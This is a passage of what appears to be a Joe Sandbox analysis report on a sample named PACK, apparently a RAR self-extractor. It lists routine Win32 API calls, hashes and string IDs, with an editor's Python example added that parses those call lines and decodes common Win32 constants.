                                                                                                                                                                            • API String ID: 1324828854-3080146196
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00FEA431
                                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FEA45E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FEA473
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00FEA484
                                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 00FEA48D
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FEA4A1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FEA4B3
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                                                            • String ID: LICENSEDLG
                                                                                                                                                                            • API String ID: 3214253823-2177901306
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FD926D
                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FD9290
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FD92AF
                                                                                                                                                                              • Part of subcall function 00FE1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00FDACFE,?,?,?,00FDACAD,?,-00000002,?,00000000,?), ref: 00FE1426
                                                                                                                                                                            • _swprintf.LIBCMT ref: 00FD934B
                                                                                                                                                                              • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00FD93C0
                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00FD93FC
                                                                                                                                                                            Strings
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                                                                                                                                                            • String ID: rtmp%d
                                                                                                                                                                            • API String ID: 2111052971-3303766350
                                                                                                                                                                            • Opcode ID: c5ef9155c036d88e637bd629a37a3dc3beb67e62951e522eb8686db46166aa43
                                                                                                                                                                            • Instruction ID: 4e62277e9e108553ac7f34a5f061236a2735ac6974ccfb2c0f84fc1d24a076d4
                                                                                                                                                                            • Opcode Fuzzy Hash: c5ef9155c036d88e637bd629a37a3dc3beb67e62951e522eb8686db46166aa43
                                                                                                                                                                            • Instruction Fuzzy Hash: A741D472905258A6DF20EBE0CC44FEE737EAF05380F0884A7B504E3242DA789B45EB60
APIs
• __aulldiv.LIBCMT ref: 00FE06F3
  • Part of subcall function 00FDA995: GetVersionExW.KERNEL32(?), ref: 00FDA9BA
• FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00FE071C
• FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,?,00000000,?), ref: 00FE072E
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FE073B
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE0751
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE075D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00FE0793
• __aullrem.LIBCMT ref: 00FE081D
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
• Opcode ID: 07d7abd5a8326a803048a79045150d63eafecee7cd5e8ece6a58b38c3594dc66
• Instruction ID: 6ae18e9de8bea2404f3f88ad71338f38cd0ce156e52df886439154a29b6a0829
• Opcode Fuzzy Hash: 07d7abd5a8326a803048a79045150d63eafecee7cd5e8ece6a58b38c3594dc66
• Instruction Fuzzy Hash: 2E4139B64083459FC310DF65C8809ABF7E9FF88714F004A2EF5D692640EB79E588DB52
APIs
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _free
• String ID: 6P+
• API String ID: 269201875-3080146196
• Opcode ID: 4ff50e685948fdcc9b633c78aaa7b11763e2fc576b9d327b08e2bd741e0af31a
• Instruction ID: 1c6868904fa848179840f28c08b53866af782bec6f3daa904e6d4c3e71c939fb
• Opcode Fuzzy Hash: 4ff50e685948fdcc9b633c78aaa7b11763e2fc576b9d327b08e2bd741e0af31a
• Instruction Fuzzy Hash: 60419336E00308DFCB14EF78C881A6EB7A5EF89724B154569E615EB351D735ED01EB80
APIs
• GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FE87A0), ref: 00FE8994
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FE89B5
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AllocByteCharGlobalMultiWide
• String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
• API String ID: 3286310052-4209811716
• Opcode ID: b3eb9ad59160a987cddfaba8ace57c00f5a668fd1e4496aae2acae072b2b8127
• Instruction ID: 6babd940932d2d90d476b3b7120d02862f846373d326ead05ae4d09e61c0ecba
• Opcode Fuzzy Hash: b3eb9ad59160a987cddfaba8ace57c00f5a668fd1e4496aae2acae072b2b8127
• Instruction Fuzzy Hash: DD3168328043457EE316BB62DC06FBF7798DF51B60F10451EF6189A0D2EF79980693A6
APIs
• ShowWindow.USER32(?,00000000), ref: 00FE8FFF
• GetWindowRect.USER32(?,00000000), ref: 00FE9044
• ShowWindow.USER32(?,00000005,00000000), ref: 00FE90DB
• SetWindowTextW.USER32(?,00000000), ref: 00FE90E3
• ShowWindow.USER32(00000000,00000005), ref: 00FE90F9
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: 464a7ff4d74b84aa72de1030b58081d819b87f157e04e01bf4b87cabb3afdbf8
• Instruction ID: 13e0d42973400a7d4a7ffaa9aa3bd218dcc687679101cd02ef7f83de4561400f
• Opcode Fuzzy Hash: 464a7ff4d74b84aa72de1030b58081d819b87f157e04e01bf4b87cabb3afdbf8
• Instruction Fuzzy Hash: CB31A431408244AFC7229FA59C48BABBBA9EF48751F008559FD899A156CB7AD800DB71
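The "APIs" sections of these function entries list each observed call as Name.MODULE(stack values), ref: call-site address, with "?" marking a value the sandbox could not recover. The value list is a snapshot of the stack, not a decoded parameter list: GlobalAlloc above is shown with sixteen values although it takes two parameters, and one ShowWindow call is shown with three values for its two parameters, so positions past the documented parameter count should not be read as arguments. The following parser, added here as an editor's example and not part of the Joe Sandbox report or its tooling, extracts these lines into structured records and decodes the well-known Win32 constants visible in the entries above (0x40 to GlobalAlloc is GPTR, 0xFDE9 = 65001 to WideCharToMultiByte is CP_UTF8, 0 and 5 to ShowWindow are SW_HIDE and SW_SHOW). The sample text is copied from the entries on this page; the decoder table and the parameter-count table are this example's own assumptions and cover only the functions named there.

```python
"""Parse the 'APIs' lines of Joe Sandbox function entries and decode constants.

Editor's example; not part of the Joe Sandbox report or its tooling.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed sample: API lines copied from function entries in this report.
SAMPLE = """\
APIs
• GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FE87A0), ref: 00FE8994
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FE89B5
• __aulldiv.LIBCMT ref: 00FE06F3
  • Part of subcall function 00FDA995: GetVersionExW.KERNEL32(?), ref: 00FDA9BA
• ShowWindow.USER32(?,00000000), ref: 00FE8FFF
• ShowWindow.USER32(?,00000005,00000000), ref: 00FE90DB
"""

# Name.MODULE(optional stack values), ref: address, optionally prefixed by the subcall note.
API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?'
    ref: int                    # address of the call site
    via_subcall: Optional[int]  # callee address when reported as "Part of subcall function"


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue  # section headings and anything that is not an API line
        raw = m.group("args")
        args = [] if raw is None or not raw.strip() else [
            None if t.strip() == "?" else int(t, 16) for t in raw.split(",")
        ]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


SW_NAMES = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED", 3: "SW_SHOWMAXIMIZED",
            4: "SW_SHOWNOACTIVATE", 5: "SW_SHOW", 6: "SW_MINIMIZE",
            7: "SW_SHOWMINNOACTIVE", 8: "SW_SHOWNA", 9: "SW_RESTORE"}
CODE_PAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65000: "CP_UTF7", 65001: "CP_UTF8"}


def gmem_flags(v: int) -> str:
    # GMEM_FIXED is 0, GMEM_MOVEABLE is 0x2, GMEM_ZEROINIT is 0x40; GPTR and GHND are the usual combinations.
    if v == 0x40:
        return "GPTR (GMEM_FIXED|GMEM_ZEROINIT)"
    if v == 0x42:
        return "GHND (GMEM_MOVEABLE|GMEM_ZEROINIT)"
    names = ["GMEM_MOVEABLE" if v & 0x2 else "GMEM_FIXED"]
    if v & 0x40:
        names.append("GMEM_ZEROINIT")
    return "|".join(names)


# (API name, zero-based parameter index) -> decoder. Assumption of this example:
# only the functions seen in this report are covered.
DECODERS: Dict[tuple, Callable[[int], Optional[str]]] = {
    ("GlobalAlloc", 0): gmem_flags,
    ("WideCharToMultiByte", 0): CODE_PAGES.get,
    ("MultiByteToWideChar", 0): CODE_PAGES.get,
    ("ShowWindow", 1): SW_NAMES.get,
}

# Documented parameter counts; values listed past this are stack slots beyond the parameters.
PARAM_COUNT = {"GlobalAlloc": 2, "WideCharToMultiByte": 8, "MultiByteToWideChar": 6,
               "ShowWindow": 2, "GetVersionExW": 1}


def annotate(call: ApiCall) -> Dict[int, str]:
    """Map parameter index -> symbolic name for every recovered value we can decode."""
    out = {}
    for i, v in enumerate(call.args):
        dec = DECODERS.get((call.name, i))
        if dec is not None and v is not None:
            name = dec(v)
            if name:
                out[i] = name
    return out


def extra_stack_values(call: ApiCall) -> List[Optional[int]]:
    """Values the report lists beyond the function's documented parameter count."""
    n = PARAM_COUNT.get(call.name)
    return [] if n is None else call.args[n:]


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        shown = c.args[:PARAM_COUNT.get(c.name, len(c.args))]
        text = ", ".join("?" if a is None else f"0x{a:X}" for a in shown)
        print(f"{c.ref:08X} {c.name}.{c.module}({text}) {annotate(c)} "
              f"extra_stack_values={len(extra_stack_values(c))}")
```

Only positions covered by PARAM_COUNT are trimmed; for any other API the full stack snapshot is kept, so extend both tables before trusting a decoded value for a function not listed.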
APIs
  • Part of subcall function 00FFB4CA: _free.LIBCMT ref: 00FFB4F3
• _free.LIBCMT ref: 00FFB554
  • Part of subcall function 00FF7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?), ref: 00FF7A66
  • Part of subcall function 00FF7A50: GetLastError.KERNEL32(?,?,00FFB4F8,?,00000000,?,00000000,?,00FFB51F,?,00000007,?,?,00FFB91C,?,?), ref: 00FF7A78
• _free.LIBCMT ref: 00FFB55F
• _free.LIBCMT ref: 00FFB56A
• _free.LIBCMT ref: 00FFB5BE
• _free.LIBCMT ref: 00FFB5C9
• _free.LIBCMT ref: 00FFB5D4
• _free.LIBCMT ref: 00FFB5DF
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
• Instruction ID: 742fb68744ea9511d77757247338edf17962f81c3e940589785dc950f0a346a8
• Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
• Instruction Fuzzy Hash: 3711FCB2544B08AAD620FBB0DD0AFEFB79C6F05B00F404816B79E66077DB6DB6146660
APIs
• GetLastError.KERNEL32(?,?,00FF168B,00FEF0E2), ref: 00FF16A2
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FF16B0
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FF16C9
• SetLastError.KERNEL32(00000000,?,00FF168B,00FEF0E2), ref: 00FF171B
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 2d838901c673552e2155c06b3a204b1216e78f5ecf9afc2ecfcc6966c76d4b88
• Instruction ID: 0aace30aae9fa596ee973db178b14432517d317fd1dff6995d7ebd960216ff41
• Opcode Fuzzy Hash: 2d838901c673552e2155c06b3a204b1216e78f5ecf9afc2ecfcc6966c76d4b88
• Instruction Fuzzy Hash: CB01DE3264831A9AA7262AB47C896363B48FF013B1B20032AF318910F6EF5A4800B364
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID:
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 0-1718035505
• Opcode ID: 2e87c2ac00e3ec3ac11691a9e8e30f811b53792a7b294c98e06cbd35f45f17c0
• Instruction ID: 4421964a53bb3a07980bd8bb38fad0008c92c15d719448318e254b71f26801a8
• Opcode Fuzzy Hash: 2e87c2ac00e3ec3ac11691a9e8e30f811b53792a7b294c98e06cbd35f45f17c0
• Instruction Fuzzy Hash: 8001F472F413E35B5F335EB75C94A972398AA02B6A320113EEBC0D7A01E756C801F7A0
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FF6B29,?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002), ref: 00FF6B98
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF6BAB
• FreeLibrary.KERNEL32(00000000,?,?,?,00FF6B29,?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6BCE
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: 6P+$CorExitProcess$mscoree.dll
• API String ID: 4061214504-2165518698
• Opcode ID: 810ef91e4d7401351d31f96bd787310dd8989051246297717f1cce9a9c8d8914
• Instruction ID: dda3fe58ae641768091db934cf5ddaaf29615c1977e16f21ec2c86ff649fd664
• Opcode Fuzzy Hash: 810ef91e4d7401351d31f96bd787310dd8989051246297717f1cce9a9c8d8914
• Instruction Fuzzy Hash: 4DF08131A0420CBBDB269B91DC0DFAEBBB9EF44715F000068FA45E6190DF354A44DB90
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE096E
  • Part of subcall function 00FDA995: GetVersionExW.KERNEL32(?), ref: 00FDA9BA
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FE0990
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00FE09AA
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FE09BB
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE09CB
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00FE09D7
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 73d8d397ce02664b7d45a8133b531008860f7c35e5bb340bf98e2ccfc3065e69
• Instruction ID: b93c6d8aca59f3324f118575d3f8397e9189f454de63ea84ce8f222f77a5fbfc
• Opcode Fuzzy Hash: 73d8d397ce02664b7d45a8133b531008860f7c35e5bb340bf98e2ccfc3065e69
• Instruction Fuzzy Hash: AF31D57A1083469AC710DFA5C8849ABB7F9FF98704F04492EF999C3211EB34D549CB6A
APIs
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: a61016e0a107088b53ec8811021b4805f3b6dcc0eac060a994a5086a043cd511
• Instruction ID: d0de72d3cf7289e43012c39a97131cae48203f7194da8cff5842cc2b9a2e5995
• Opcode Fuzzy Hash: a61016e0a107088b53ec8811021b4805f3b6dcc0eac060a994a5086a043cd511
• Instruction Fuzzy Hash: F521FB7260024AAFEB14AA17CC81F3B73AC9B517D4F244539FC4CDA101E634ED46A2B5
APIs
• GetLastError.KERNEL32(?,010100E0,00FF3394,010100E0,?,?,00FF2E0F,?,?,010100E0), ref: 00FF851A
• _free.LIBCMT ref: 00FF854D
• _free.LIBCMT ref: 00FF8575
• SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF8582
• SetLastError.KERNEL32(00000000,?,010100E0), ref: 00FF858E
• _abort.LIBCMT ref: 00FF8594
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 56534b2858e2c0d8e4ea46dac964c31a80618e5afd5cc9441ece426a83a58cd8
• Instruction ID: 066672b8ed645ac591628686234ae7b08a6267331207714c07243dca6f0470e4
• Opcode Fuzzy Hash: 56534b2858e2c0d8e4ea46dac964c31a80618e5afd5cc9441ece426a83a58cd8
• Instruction Fuzzy Hash: 78F0F93664870827C31273346C49F3A315A8FD1BB1F2D0114F754A7176EF6D8A03B224
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00FF34E6,00000000,00000000,00FF451B,?,00FF451B,?,00000001,00FF34E6,31E85006,00000001,00FF451B,00FF451B), ref: 00FFB637
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FFB6C0
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00FFB6D2
• __freea.LIBCMT ref: 00FFB6DB
  • Part of subcall function 00FF7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FF2FA6,?,0000015D,?,?,?,?,00FF4482,000000FF,00000000,?,?), ref: 00FF7ABC
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID: 6P+
• API String ID: 2652629310-3080146196
• Opcode ID: 255a7dbda072f3502fa68e683007deace3c4fbe55898fb0bdb01ab07f371ccf4
• Instruction ID: f3193c47948fe40f861f01f3c1d221aca84a59820c09455947e10a9f3c950966
• Opcode Fuzzy Hash: 255a7dbda072f3502fa68e683007deace3c4fbe55898fb0bdb01ab07f371ccf4
• Instruction Fuzzy Hash: 88319F72A0020EABDF259F65DC45DBE7BA5EF44710F144168FE04D61A0E739DD50DBA0
APIs
  • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
  • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
• EndDialog.USER32(?,00000001), ref: 00FEC2F2
• GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00FEC308
• SetDlgItemTextW.USER32(?,00000066,?), ref: 00FEC322
• SetDlgItemTextW.USER32(?,00000068), ref: 00FEC32D
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
